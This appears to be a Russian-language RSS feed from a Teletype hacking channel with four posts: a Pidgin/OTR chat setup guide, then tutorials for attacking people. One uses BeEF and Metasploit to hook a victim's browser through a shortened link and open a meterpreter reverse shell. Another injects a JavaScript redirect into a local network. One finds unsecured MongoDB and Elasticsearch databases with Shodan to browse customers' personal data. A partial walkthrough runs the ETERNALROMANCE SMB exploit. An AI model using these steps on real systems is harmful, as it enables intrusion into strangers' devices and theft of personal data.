<?xml version="1.0" encoding="utf-8" ?><rss version="2.0" xmlns:tt="http://teletype.in/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/"><channel><title>@krakenteam</title><generator>teletype.in</generator><description><![CDATA[@krakenteam]]></description><link>https://teletype.in/@krakenteam?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=krakenteam</link><atom:link rel="self" type="application/rss+xml" href="https://teletype.in/rss/krakenteam?offset=0"></atom:link><atom:link rel="next" type="application/rss+xml" href="https://teletype.in/rss/krakenteam?offset=10"></atom:link><atom:link rel="search" type="application/opensearchdescription+xml" title="Teletype" href="https://teletype.in/opensearch.xml"></atom:link><pubDate>Sat, 11 Apr 2026 15:25:38 GMT</pubDate><lastBuildDate>Sat, 11 Apr 2026 15:25:38 GMT</lastBuildDate><item><guid isPermaLink="true">https://teletype.in/@krakenteam/s5OqcUW9c</guid><link>https://teletype.in/@krakenteam/s5OqcUW9c?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=krakenteam</link><comments>https://teletype.in/@krakenteam/s5OqcUW9c?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=krakenteam#comments</comments><dc:creator>krakenteam</dc:creator><title>Настройка Jabber (XMPP) клиента Pidgin и OTR шифрование.</title><pubDate>Thu, 19 Mar 2020 07:50:11 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/db/db33e208-dbc5-4899-8730-1fba484ca94d.png"></media:content><description><![CDATA[<img src="https://telegra.ph/file/5515c7c152cb96ddb85e6.png"></img>KRAKENteam]]></description><content:encoded><![CDATA[
  <p>KRAKENteam</p>
  <p>Установка Jabber (XMPP) клиента Pidgin и регистрация нового аккаунта:</p>
  <p>1. Качаем клиент (оффлайн инсталлятор)</p>
  <p>Ждём 5 секунд и процесс скачивания запускается.</p>
  <p>2. Качаем плагин шифрования (OTR)</p>
  <p>3. Устанавливаем клиент и плагин.</p>
  <p>а) Запускаем pidgin-2.10.6-offline.exe, выбираем язык и нажимаем &quot;Ok&quot;.</p>
  <figure class="m_column">
    <img src="https://telegra.ph/file/5515c7c152cb96ddb85e6.png" width="314" />
  </figure>
  <p>Нажимаем 3 раза &quot;Далее&quot; и &quot;Установить&quot;, после процесса установки нажимаем &quot;Далее&quot; и &quot;Готово&quot;.</p>
  <p>б) Запускаем pidgin-otr-3.2.1-2.exe</p>
  <p>Нажимаем &quot;Next&quot; =&gt; &quot;I Agree&quot; =&gt; &quot;Install&quot; =&gt; &quot;Finish&quot;</p>
  <p>4. Запускаем Pidgin. Видим главное окошко программы (ростер) и сообщение приветствия с предложением добавить учетную запись.</p>
  <p>Нажимаем &quot;Добавить&quot;.</p>
  <figure class="m_column">
    <img src="https://telegra.ph/file/710305f56792315fb0580.png" width="547" />
  </figure>
  <p>В следующем окне вводим данные вашего нового аккаунта и сервера send.tc ( Данный сервер принадлежит Cosmonavt&#x27;у, ведение логов на сервере отключено, TSL AES 256 шифрование ).</p>
  <p>Протокол: XMPP</p>
  <p>Имя пользователя: Ваш Ник</p>
  <p>Домен: send.tc</p>
  <p>Пароль: Придумайте Пароль</p>
  <p>Поставить галочку &quot;Запомнить пароль&quot;</p>
  <p>В самом низу поставить галочку &quot;Создать эту новую учётную запись на сервере&quot;</p>
  <p>После того, как заполнили указанные поля, жмём на кнопочку &quot;Добавить&quot;.</p>
  <figure class="m_column">
    <img src="https://telegra.ph/file/56e7bf75c78d68e6d15ec.png" width="542" />
  </figure>
  <p>Далее следует принять сертификат для сервера topsec.in, нажимаем &quot;Принять&quot;.</p>
  <figure class="m_column">
    <img src="https://telegra.ph/file/9a91882e817811214156e.png" width="568" />
  </figure>
  <p>Немного погодя, вылезет запрос на регистрацию новой учётной записи, где поля уже будут заполненны и останется нажать кнопку &quot;Зарегистрировать&quot;. После этого вы увидите, что запрос на регистрацию принят и ваша учётная запись была зарегистрирована.</p>
  <figure class="m_column">
    <img src="https://telegra.ph/file/807d3a1cc61e7e6195fd8.png" width="418" />
  </figure>
  <p>5. Идём в &quot;Уч.записи&quot; =&gt; Управление учетными записями =&gt; Видим нашу учётную запись =&gt; Cтавим галочку в колонке Включено, напротив вашей учетной записи и нажимаем закрыть. Потом включаем. Если вы не видите учётную запись, то загляните в пункт &quot;Включить учётную запись&quot; в меню &quot;Уч.записи&quot; и включите её, кликнув один раз на неё.</p>
  <figure class="m_column">
    <img src="https://telegra.ph/file/5e1e4bdfd369663d1e595.png" width="551" />
  </figure>
  <p>Поздравляю, вы зарегистрировали себе учётную запись. Осталось добавить собеседников. Или о том, как добавить JID (Jabber ID. Формируется следующим путём: Ваш_Ник@домен сервера. Например: ETOJID@TOPSEC.IN) товарища себе в контакт лист.</p>
  <figure class="m_column">
    <img src="https://telegra.ph/file/e855c5b063b73562456c1.png" width="640" />
  </figure>
  <p>1. В главном окне жмём на меню &quot;Собеседники&quot; -&gt; Добавить собеседника.</p>
  <p>В поле имя пользователя собеседника вбиваем его JID (что это такое, разжёвано выше. Например: ETOJID@TOPSEC.IN). В поле &quot;Псевдоним&quot; вбиваем локальный псевдоним собеседника - то прозвище, которое будет показано вам в ростере.</p>
  <figure class="m_column">
    <img src="https://telegra.ph/file/1970f08ac28e1fb0f78d9.png" width="640" />
  </figure>
  <p>2. После, нажмите на кнопку &quot;Добавить&quot;. Собеседнику будет отправлен запрос на авторизацию, он должен будет нажать у себя в ростере кнопку &quot;Авторизировать&quot;. В ответ вам придёт точно такой-же запрос, где вы должны сделать то же самое (нажать на кнопку &quot;Авторизировать&quot;).</p>
  <p>Собственно, всё.</p>
  <p>Теперь рассмотрим плагин шифрования OTR и настроим его на правильное функционирование.</p>
  <p>1. Основные свойства протокола OTR</p>
  <p>Шифрование сообщений - никто иной не сможет прочитать сообщения;</p>
  <p>Аутентификация собеседников - уверенность в том, кто является собеседником;</p>
  <p>Если потеряны секретные ключи, прошлая переписка не будет скомпрометирована;</p>
  <p>Возможность отречения - третье лицо не сможет доказать, что сообщения написаны какому-либо другому адресату.</p>
  <p>2. Установка OTR плагина.</p>
  <p>Плагин OTR представляет собой .exe-файл. Запускаем его (установка проходит на английском языке).</p>
  <p>Окно приветствия. Нажимаем на кнопку &quot;Next&quot;.</p>
  <p>Лицензионное соглашение. &quot;I Agree&quot;.</p>
  <p>Выбор установочной папки. Оставляем как есть и нажимаем &quot;Install&quot;.</p>
  <p>Завершается процедура установки модуля. Снимаем галочку из пункта &quot;Show Readme&quot;.</p>
  <p>3. Настройка OTR</p>
  <p>OTR-защита подразумевает, что у обоих собеседников должны быть</p>
  <p>установлены плагины OTR. Каждый пользователь создает ключ, которым</p>
  <p>шифруется вся его переписка.</p>
  <p>a) Сначала следует включить и настроить модуль OTR.</p>
  <p>В меню Pidgin &quot;Средства&quot; –&gt; &quot;Модули&quot; выбираем (из списка)</p>
  <p>модуль &quot;Off-the-Record Messaging&quot;, ставим галочку и нажимаем &quot;Настроить</p>
  <p>модуль&quot;.</p>
  <figure class="m_column">
    <img src="https://telegra.ph/file/a14968bfcc1151a11bac8.png" width="450" />
  </figure>
  <p>b) Выбираем нужный аккаунт и создаем ключ. Для этого нужно просто выбрать аккаунт из списка и нажать на кнопку &quot;Создать&quot;.</p>
  <figure class="m_column">
    <img src="https://telegra.ph/file/308569ad15ccf906cc277.png" width="640" />
  </figure>
  <p>c) Когда Pidgin завершит создание ключа, появится маленькое окошко с информацией об этом. Нажимаем &quot;ОК&quot;.</p>
  <p>d) Теперь мы видим созданный ключ и его отпечаток (fingerprint). В</p>
  <p>этой же вкладке (&quot;OTR&quot; – &quot;Конфигурация&quot;) расставим галочки таким образом: &quot;Включить защиту разговоров&quot; – да,</p>
  <p>&quot;Автоматически начинать защищенный разговор&quot; – да, &quot;Только защищённый разговор&quot; - да, &quot;Не записывать разговоры OTR в журнал&quot; – да. (Учтите, включив последнюю галочку, логи сохраняться не будут.</p>
  <p>Теперь модуль настроен и готов к работе. В окне переписки появилась иконка OTR.</p>
  <p>4. Настройка защищенного разговора.</p>
  <p>В окне переписки нажимаем на красную иконку &quot;Не защищенно&quot;\&quot;Не идентиф.&quot;</p>
  <figure class="m_column">
    <img src="https://telegra.ph/file/6d3d38977364631fe82d7.png" width="470" />
  </figure>
  <p>В появившемся окне выбираем &quot;идентифицировать контакт&quot;.</p>
  <p>Существует три способа идентифицировать контакт.</p>
  <p>1. Question and answer — Вы должны будите задать секретный вопрос и ввести и правильный ответ на него.</p>
  <p>Ваш собеседник должен правильно ответить. После этого он будет идентифицирован, и Ваш разговор будет происходить в защищенном режиме.</p>
  <p>2. Shared secret - Вы должны будете использовать секретный ключ,известный только Вам и Вашему собеседнику.</p>
  <p>После того как Вы и Ваш собеседник ввели одинаковый ключ, защищенный разговор включен.</p>
  <p>3. Manual fingerprint verification- проверка отпечатков. Вы связываетесь с собеседником, сообщаете ему свой отпечаток.</p>
  <p>Он сообщает Вам свой. Сверяете отпечатки.Если сходятся,то Вы отмечаете что все совпало.</p>
  <p>Как передавать секретный ответ\Секретный ключ\Отпечаток, решать только вам.</p>
  <p>Итак, допустим решили использовать третий вариант, выбираем &quot;Manual fingerprint verification&quot;, выбираем &quot;Есть&quot; и нажимаем &quot;Authenticate&quot;.</p>
  <figure class="m_column">
    <img src="https://telegra.ph/file/9357d495e24d0753ce8fe.png" width="434" />
  </figure>
  <p>Сообщение &quot;The privacy status of the current conversation is now: Защищено&quot; свидетельствует о том что ваш разговор защищен.</p>
  <figure class="m_column">
    <img src="https://telegra.ph/file/0cde802e69afa169b2108.png" width="478" />
  </figure>
  <p><br /></p>
  <p>На этом всё</p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@krakenteam/UgNLGXjt4</guid><link>https://teletype.in/@krakenteam/UgNLGXjt4?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=krakenteam</link><comments>https://teletype.in/@krakenteam/UgNLGXjt4?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=krakenteam#comments</comments><dc:creator>krakenteam</dc:creator><title>Взлом ОС через ссылку.</title><pubDate>Thu, 19 Mar 2020 07:43:36 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/03/5a/035ae94f-ddc8-420e-b20d-6144d4e72e5a.png"></media:content><description><![CDATA[<img src="https://telegra.ph/file/2013146bf1a8586fb9383.png"></img>KRAKENteam (взято с канала Krebs World Wide)]]></description><content:encoded><![CDATA[
  <p>KRAKENteam (взято с канала Krebs World Wide)</p>
  <h4>Введение.</h4>
  <p>Каждый раз когда вы переходите по ссылке от неизвестного вам человека, задумывались ли вы о всей опасности того что вы сделали?</p>
  <p>Переходя по ссылке вы можете не подозревать, но на вашем устройстве после перехода могут находится вредоносные программы а ваши персональные данные могут быть похищены. Сегодня мы на примерах убедимся во всей опасности...</p>
  <ul>
    <li>Первое что может случится при переходе по ссылке это то, что злоумышленник получит доступ к вашим аккаунтам социальных сетей.</li>
    <li>Могут узнать ваш IP. И если вы думаете что это не страшно, то вы глубоко ошибаетесь.</li>
    <li>Подгрузить малварь используя <strong>exploit pack</strong>.</li>
  </ul>
  <p>На мой взгляд, это самое серьезное что может произойти. Ну что, меньше теории больше практики!</p>
  <h3>Подгружаем малварь.</h3>
  <p><strong>Exploit pack</strong> - это своеобразная связка эксплойтов.</p>
  <p>К преибольшому сожалению я не буду показывать в этой теме использование <strong>exploit pack</strong>&#x27;а. По той простой причине, что огонь это не игрушка. Но мы все равно завладеем всем устройством пользователя когда он перейдет по ссылке. А поможет нам сегодня <strong>beef</strong> в связке с <strong>metasploit</strong>.</p>
  <p><strong>Beef</strong> - это фреймворк для проведения XSS атак путем заражения и дальнейшего использования.</p>
  <p><strong>Metasploit</strong> - фреймворк для поиска и эксплуатации уязвимостей. То есть для проведения тестирования на проникновение.</p>
  <h3>Запуск beef.</h3>
  <p>В терминале пишем:</p>
  <pre>beef-xss
</pre>
  <p>Переходим по ссылке: http://127.0.0.1:3000/ui/authentication</p>
  <p>Теперь нужно авторизироватся. Логин и пароль по умолчанию beef:beef.</p>
  <p>Нам нужно чтобы &quot;жертва&quot; выполнила у себя скрипт hook.js</p>
  <p>Нужно подгрузить его ей.</p>
  <p>http://&lt;ваш ip&gt;:3000/demos/basic.html</p>
  <p>Далее сократите ссылку и скиньте пользователю. Как только он переходит по ссылке на панели управления beef в разделе Online browsers появится активный браузер. Это браузер нашего пользователя.</p>
  <p>Половина дел сделано. Теперь подключим к нашей работе metasploit. Для этого:</p>
  <ol>
    <li>Открываем файл config.yaml у beef. Часто он находится в этой дериктории - /usr/share/beef-xss/</li>
    <li>Ищем там раздел extension. У metasploit меняем значение параметра на true</li>
  </ol>
  <figure class="m_column">
    <img src="https://telegra.ph/file/2013146bf1a8586fb9383.png" width="1100" />
  </figure>
  <ol>
    <li>Теперь же открываем файл /usr/share/beef-xss/extensions/metasploit/config.yaml и изменяем значение параметров у callback_host и host.</li>
    <li>Запускаем metasploit и пишем следующее</li>
  </ol>
  <pre>msf&gt; load msgrpc
</pre>
  <figure class="m_column">
    <img src="https://telegra.ph/file/94ed8e3b2d4f1ea573e77.png" width="391" />
  </figure>
  <p>И снова открываем файл из пункта 3. В pass вписываем получившийся с генерированный пароль. Остается сохранить.</p>
  <p>Переходим в /usr/share/beef-xss/ и пишем</p>
  <pre>./beef -x
</pre>
  <p>После этого в beef загрузятся exploit&#x27;ы.</p>
  <p>Теперь нам доступны exploit&#x27;ы которые мы тоже подгрузить пользователю и выполнить их. Для начала я хотел бы узнать какая ОС у моего пользователя.</p>
  <figure class="m_column">
    <img src="https://telegra.ph/file/a4ebd0f275708fce2a7d2.png" width="1100" />
  </figure>
  <p>И как видно на скриншоте - это windows.</p>
  <p>Теперь переходим во вкладку Commands и ищем - msf_ms05_054_onload</p>
  <figure class="m_column">
    <img src="https://telegra.ph/file/2547fb84df4d926054f60.png" width="1100" />
  </figure>
  <p>Выберем payload. Так как у моей &quot;жертвы&quot; windows я выбрал - windows/meterpreter/reverse_tcp</p>
  <p>Заполняем все поля.</p>
  <p>Теперь открываем msf и пишем:</p>
  <pre>  1. use exploit/multi/handler
  2. set payload windows/meterpreter/reverse_tcp
  3. set LHOST &lt;your_ip&gt;
  4. exploit
</pre>
  <p>Во второй команде пишете название пайлоада который выбрали в beef. Вот и все)</p>
  <p>А пользователь всего-то перешел по ссылке.</p>
  <p>А что если пользователь придерживается правил &quot;я по незнакомым ссылкам не хожу&quot;? На этот случай у нас имеется еще один ответ. Создаем файл hack.js с таким содержимым:</p>
  <pre>&lt;script&gt;
  document.location.href=&quot;http://&lt;your ip&gt;:3000/demos/basic.html&quot;;
&lt;/script&gt;
</pre>
  <p>Запускаем <strong>xerosploit</strong>. И выбираем:</p>
  <pre>scan --&gt; ip жертвы --&gt; injectjs --&gt; run --&gt; путь до hack.js
</pre>
  <p>Далее проделываем выше описанное. Вот так мы взломали не о чем не подозревающего пользователя. Будьте осторожны, друзья.</p>
  <h3>Вывод</h3>
  <p>Не стоит переходить по ссылкам от незнакомцев, это может нанести критический вред вашему устройству. А представьте себе если залить hook.js на уязвимый к xss веб-ресурс? Последствия просто ужасны.</p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@krakenteam/PXHfMNOY</guid><link>https://teletype.in/@krakenteam/PXHfMNOY?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=krakenteam</link><comments>https://teletype.in/@krakenteam/PXHfMNOY?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=krakenteam#comments</comments><dc:creator>krakenteam</dc:creator><title>Открытые базы данных и их взлом с помощью Shodan</title><pubDate>Sun, 08 Mar 2020 13:45:35 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/39/a4/39a4774e-6869-47e5-9a19-f27800346792.png"></media:content><description><![CDATA[<img src="https://i0.wp.com/cryptoworld.su/wp-content/uploads/2019/03/d1d9eb770f63bc1bea9a0.jpg?resize=960%2C572&amp;amp;ssl=1"></img>KRAKENteam]]></description><content:encoded><![CDATA[
  <p>KRAKENteam</p>
  <h3>Поиск открытых БД с помощью Shodan</h3>
  <p>Для поиска БД используются специальные поисковики <a href="https://tgraph.io/Ispolzuem-Shodan-v-komandnoj-stroke-12-28" target="_blank">Shodan</a> и Censys. Базы данных имеют определенный паттерн в виде порта и так называемого заголовка. Например, для MongoDB это стандартный порт 27017 и наличие заголовка «mongodb server information». Такие шаблоны существуют и для других БД.</p>
  <p>Самый популярный вариант — MongoDB. На момент написания статьи проиндексировано <strong>69100</strong> результатов. Большинство из них закрыты (об этом говорит наличие параметра <strong>Authentication partially enabled</strong>).</p>
  <p>Чтобы найти открытые БД создаем запрос:</p>
  <pre>all:&quot;mongodb server information&quot; all:&quot;metrics&quot;
</pre>
  <p>В данном случае получаем <strong>24943</strong> результата. Примерно столько существует открытых БД, которые содержат определенную информацию. Конечно, какая-то часть — пустышки, в них нет ничего интересного. Но это уже предмет анализа.</p>
  <p><br /></p>
  <figure class="m_column">
    <img src="https://i0.wp.com/cryptoworld.su/wp-content/uploads/2019/03/d1d9eb770f63bc1bea9a0.jpg?resize=960%2C572&ssl=1" width="960" />
    <figcaption>USA — лидер по открытым MongoDB с результатом 7915.</figcaption>
  </figure>
  <p>По запросу Elasticsearch результатов меньше. <strong>20283</strong> проиндексированных записей, а лидер — Китай.</p>
  <pre>port:&quot;9200&quot; all:&quot;elastic indices&quot;
</pre>
  <figure class="m_column">
    <img src="https://i1.wp.com/cryptoworld.su/wp-content/uploads/2019/03/dd03b33a3a3f1452ad5eb.jpg?resize=960%2C512&ssl=1" width="960" />
  </figure>
  <p>Чтобы полноценно работать с результатами выдачи БД: фильтровать записи по размеру, дате попадания в индекс, количеству коллекций и т.д. нужно использовать более функциональные инструменты. Один из них ― <strong>Lampyre</strong>.</p>
  <p><br /></p>
  <p>Если нет желания доставлять себе софт, можно использовать давно знакомый <a href="https://cli.shodan.io/" target="_blank">Shodan Command-Line Interface</a>. Для тех, кто хочет работать с помощью командной строки я подготовил <a href="https://pastebin.com/raw/DfXcAuVY" target="_blank"><strong>файл</strong></a> с командами, которые позволяют находить и анализировать данные в форматах json или xlsx.</p>
  <p>Для работы с более экзотическими базами рекомендую использовать <a href="https://github.com/woj-ciech/LeakLooker" target="_blank">LeakLooker</a>. Скрипт написан на Python и работает с Shodan. Помимо стандартных БД поддерживает Kibana, CouchDB.</p>
  <figure class="m_column">
    <img src="https://i0.wp.com/cryptoworld.su/wp-content/uploads/2019/03/a10caf9bdb5c377ed2ce6.jpg?resize=426%2C825&ssl=1" width="426" />
  </figure>
  <h3>Поиск открытых БД с помощью Lampyre</h3>
  <p>Для более гибких настроек можно воспользоваться инструментом <a href="https://lampyre.io/" target="_blank">Lampyre</a> для ОС Windows. После скачивания приложения необходимо указать почту и подтвердить свой аккаунт. После запуска в режиме <strong>Online Mode,</strong> нужно нажать <strong>New Investidation, </strong>выбрать папку для хранения проекта и начать работу.</p>
  <p>В <strong>List of requests</strong> выбираем <strong>Shodan search. </strong>Вводим API ключ и наш запрос в поле Query, который позволит найти открытые БД.</p>
  <pre>all:&quot;mongodb server information&quot; all:&quot;metrics&quot;
</pre>
  <figure class="m_column">
    <img src="https://i1.wp.com/cryptoworld.su/wp-content/uploads/2019/03/8b5a55d7bdf664ccca6f5.png?resize=960%2C602&ssl=1" width="960" />
  </figure>
  <p>Также можно указать дополнительные параметры в окне Shodan — 2. Например, страну и порт. Запускаем с помощью кнопки «Execute». Далее появляются результаты. Для графического отображения необходимо выбрать «Schema»-&gt;»Network».</p>
  <p><br /></p>
  <figure class="m_column">
    <img src="https://i1.wp.com/cryptoworld.su/wp-content/uploads/2019/03/c0e36c19e1b957b52aea7.png?resize=960%2C359&ssl=1" width="960" />
  </figure>
  <p>Lampyre может фильтровать найденные запросы с помощью встроенного запроса <strong>ExploreDB: MongoDB</strong>. Выбираем необходимые IP, после этого правой кнопкой вызываем меню и указываем <strong>ExploreDB: MongoDB.</strong></p>
  <figure class="m_column">
    <img src="https://i1.wp.com/cryptoworld.su/wp-content/uploads/2019/03/154f7cf2797a9e36353b6.png?resize=806%2C619&ssl=1" width="806" />
  </figure>
  <p>После чего получаем все запросы в удобном формате. Можно фильтровать по размеру БД и другим параметрам, которых нет в Shodan. Подтверждением того, что БД открытая, служит параметр <strong>text</strong>, который имеет статус <strong>open. </strong>Стоит сортировать результаты по параметрам <strong>Size</strong> и <strong>Count documents</strong>, так как самые интересные БД будут содержать максимальное количество записей в таблицах.</p>
  <figure class="m_column">
    <img src="https://i0.wp.com/cryptoworld.su/wp-content/uploads/2019/03/37e4767ad1a2a2141857e.png?resize=960%2C139&ssl=1" width="960" />
  </figure>
  <p>Также можно заметить со скриншотов, что Lampyre поддерживает работу с <strong>ExploreDB: ElasticSearch. </strong>Делаем все по аналогии, используя запрос:</p>
  <pre>port:&quot;9200&quot; all:&quot;elastic indices&quot;
</pre>
  <figure class="m_column">
    <img src="https://i1.wp.com/cryptoworld.su/wp-content/uploads/2019/03/62b32195c4039274b4372.png?resize=960%2C349&ssl=1" width="960" />
  </figure>
  <p>Получаем в удобном виде базы данных ElasticSearch. Их можно посмотреть, перейдя по ссылке в столбце «<strong>http query top 500</strong>«.</p>
  <figure class="m_column">
    <img src="https://i2.wp.com/cryptoworld.su/wp-content/uploads/2019/03/feb7341836c618e3c105e.jpg?resize=960%2C265&ssl=1" width="960" />
  </figure>
  <p>В итоге находим открытую БД какого-то магазина, где можно найти телефон, дату создание, описание, почту и еще некоторую интересную информацию. Помните, те кто ищет, тот всегда найдет 🙂</p>
  <figure class="m_column">
    <img src="https://i1.wp.com/cryptoworld.su/wp-content/uploads/2019/03/adbd1fa08b5d1562cfba1.png?resize=960%2C236&ssl=1" width="960" />
  </figure>
  <p>Для работы с полученными БД можно использовать любой удобный для вас менеджер. Например, для MongoDB подойдет NoSQL Manager for MongoDB, Robo 3T или Studio 3T for MongoDB. Рассмотрим, на примере один из вариантов.</p>
  <h3>Анализируем базы данных с помощью Robo 3T for MongoDB</h3>
  <p>Выбор пал на бесплатную версию <a href="https://robomongo.org/" target="_blank">Robo 3T</a>. Portable-версия занимает около 15 мб и позволяет быстро подключиться к нужной БД. После запуска видим окно, куда нужно указать IP-адрес. Нажимаем правой кнопкой и добавляем с помощью кнопки Add.</p>
  <figure class="m_column">
    <img src="https://i2.wp.com/cryptoworld.su/wp-content/uploads/2019/03/e95ed7b58f8ff7bc8198d.png?resize=653%2C402&ssl=1" width="653" />
  </figure>
  <p>Указываем нужный IP и нажимаем Save.</p>
  <figure class="m_column">
    <img src="https://i0.wp.com/cryptoworld.su/wp-content/uploads/2019/03/0bb2d4426ddf43ccccca6.png?resize=552%2C430&ssl=1" width="552" />
  </figure>
  <p>После удачного подключения можем посмотреть БД. Если подключение произошло, то в левой панели появится новый клиент.</p>
  <figure class="m_column">
    <img src="https://i0.wp.com/cryptoworld.su/wp-content/uploads/2019/03/c02882bbc9e1a0d34f9bd.png?resize=260%2C264&ssl=1" width="260" />
  </figure>
  <p>Дальше смотрим коллекции, которые используются в БД:</p>
  <figure class="m_column">
    <img src="https://i1.wp.com/cryptoworld.su/wp-content/uploads/2019/03/c4b1daab47985cbd7afc9.png?resize=960%2C648&ssl=1" width="960" />
  </figure>
  <figure class="m_column">
    <img src="https://i2.wp.com/cryptoworld.su/wp-content/uploads/2019/03/4e35a85f6bde2de0e6e4a.png?resize=960%2C422&ssl=1" width="960" />
  </figure>
  <p>Можно использовать любой менеджер для работы с БД. Также можно обрабатывать данные и с командной строки. Несмотря на то, что Studio 3T for MongoDB имеет больший функционал (который доступен в течении пробного периода на 30 дней), ты увидел, что можно вполне нормально работать и с бесплатными программами. Все индивидуально.</p>
  <h4>Заключение</h4>
  <p>Открытых баз данных действительно много. Почти каждую неделю выходит громкая новость об утечке данных. Это может быть БД отеля, магазина или сервисного центра. При беглом просмотре, среди примеров в статьи было два удачных варианта: магазин и доска объявлений продажи автомобилей. В первом случае, можно было посмотреть заказ, описание и телефон/почту владельца, во втором случае — телефон и марку машины.</p>
  <p>Очень часто встречаются конфиденциальные данные в незашифрованном виде. Многие компании хранят информацию и даже не задумываются о возможных последствиях. Я продемонстрировал достаточно способов, чтобы найти открытые БД с терабайтами записей. Что делать с найденной информацией — выбор за тобой.</p>
  <p></p>
  <p>Дисклеймер- мы не призываем Вас к каким-либо действиям, статья написана исключительно в ознакомительных целях, мы не несем никакой ответственности за Ваши действия!!</p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@krakenteam/MWxTGgaQ</guid><link>https://teletype.in/@krakenteam/MWxTGgaQ?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=krakenteam</link><comments>https://teletype.in/@krakenteam/MWxTGgaQ?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=krakenteam#comments</comments><dc:creator>krakenteam</dc:creator><title>Взлом ПК с помощью эксплоита ETERNALROMANCE/SYNERG.</title><pubDate>Sun, 08 Mar 2020 13:33:11 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/8c/20/8c207ba4-bca1-4b42-a93e-34cf96d6d4e1.png"></media:content><description><![CDATA[<img src="https://www.securitylab.ru/_Article_Images/2017/51/clip_image002.png"></img>KRAKENteam]]></description><content:encoded><![CDATA[
  <p>KRAKENteam</p>
  <p>ВЗЯТО С КАНАЛА Dark Times</p>
  <p> Как обычно, вся информация приводится в ознакомительных целях.</p>
  <p> Настройка лабораторной среды</p>
  <p> Для настройки лабораторной среды нужно сконфигурировать следующие системы:</p>
  <p>Целевая система - Windows Server 2016 </p>
  <p>Эта машина с установленной 64-битной операционной системой Windows Server 2016 будет использоваться в качестве целевой.</p>
  <p> </p>
  <figure class="m_column">
    <img src="https://www.securitylab.ru/_Article_Images/2017/51/clip_image002.png" width="555" />
    <figcaption>Конфигурация целевой машины</figcaption>
  </figure>
  <p>После установки операционной системы дополнительные настройки не требуются. Достаточно знать IP-адрес и убедиться в том, что машина включена на момент атаки.</p>
  <p>Система злоумышленника - GNU/Linux </p>
  <p>Возможно использование любой другой операционной системы, которая поддерживает работу следующих инструментов:</p>
  <ul>
    <li>Python v2.7 - https://www.python.org/download/releases/2.7/ </li>
    <li>Ps1Encode - https://github.com/CroweCybersecurity/ps1encode </li>
    <li>Metasploit Framework - https://github.com/rapid7/metasploit-framework </li>
  </ul>
  <p>В итоге у нас есть две настроенные машины, используемые в лабораторной среде: </p>
  <ul>
    <li>Windows Server 2016 x64 – IP-адрес: 10.0.2.13 - Целевая система. </li>
    <li>GNU/Linux Debian x64 – IP-адрес: 10.0.2.6 - Система злоумышленника<em>. </em></li>
  </ul>
  <p>Получение эксплоита</p>
  <p> Эксплоит можно скачать по следующей ссылке:</p>
  <p> <a href="https://www.exploit-db.com/exploits/42315" target="_blank">https://www.exploit-db.com/exploits/42315/</a>.</p>
  <p> Поскольку скрипт написан на Python, сохраняем файл с расширением .py на машине злоумышленника. Во время запуска возникает следующая ошибка:</p>
  <p> </p>
  <figure class="m_column">
    <img src="https://www.securitylab.ru/_Article_Images/2017/51/clip_image004.png" width="590" />
    <figcaption>Ошибка, возникающая при запуске эксплоита</figcaption>
  </figure>
  <p>Решение проблем с зависимостями</p>
  <p> В третьей строке эксплоита импортируется модуль &quot;mysmb&quot;, которого нет в Python. Установить этот модуль, разработанный Sleepya, можно установить при помощи утилиты pip, либо скачать по следующей ссылке: <a href="https://github.com/worawit/MS17-010/blob/master/mysmb.py" target="_blank">https://github.com/worawit/MS17-010/blob/master/mysmb.py</a>.</p>
  <p> Файл модуля с именем &quot;mysmb.py&quot; помещаем в папку со скриптом. Для того чтобы эксплоит смог импортировать код модуля, необходимо создать файл с именем «__INIT__.py» с перечнем нужных модулей.</p>
  <p> Теперь скрипт сможет найти нужный модуль и не будет выдавать ошибок:</p>
  <p> </p>
  <figure class="m_column">
    <img src="https://www.securitylab.ru/_Article_Images/2017/51/clip_image006.png" width="624" />
    <figcaption>Добавление файла __INIT__.py и запуск эксплоита</figcaption>
  </figure>
  <p>Проверка работоспособности эксплоита</p>
  <p> Возможна проверка работоспособности эксплоита без каких-либо модификаций. Если мы запустим скрипт как есть по завершению работы в корневой директории диска C:\ на целевой машине будет создан файл с именем &quot;pwned.txt&quot;. </p>
  <p> Несмотря на то, что в простейшем случае никакие изменения не требуются, конкретно в вашей ситуации может потребоваться модификация некоторых параметров.</p>
  <p> Аутентификация</p>
  <p>Уязвимость, используемая в эксплоите ETERNALROMANCE/SYNERGY, требует аутентификации. Эксплуатацию можно осуществить через гостевую учетную запись. Если гостевой аккаунт отключен, нам нужно получить имя пользователя и пароль любой другой учетной записи, которая используется на целевой машине. Важно отметить, что уровень привилегий не имеет значения. Даже если учетная запись с гостевыми правами, после атаки привилегии будут повышены до системного уровня. </p>
  <p>Информация об учетной записи задается в файле exploit.py в строках 26-27:</p>
  <figure class="m_column">
    <img src="https://www.securitylab.ru/_Article_Images/2017/51/clip_image008.png" width="624" />
    <figcaption>Информация об имени пользователя и пароле, используемых для аутентификации во время атаки</figcaption>
  </figure>
  <p>Параметры</p>
  <p>Для корректной работы эксплоита необходимо настроить два параметра: IP-адрес целевой машины и имя канала (pipe name). Протокол SMB поддерживает три типа общих ресурсов:</p>
  <ul>
    <li>File: файловые (или дисковые) общие ресурсы, представляющие собой дерево директорий с файлами.</li>
    <li>Print: доступ к ресурсам принтера на сервере.</li>
    <li>Pipe: коммуникация между процессами, использующими модель FIFO, при помощи именованных каналов, которые активны до тех пор, пока система работает, даже если процесс уже не активен. </li>
  </ul>
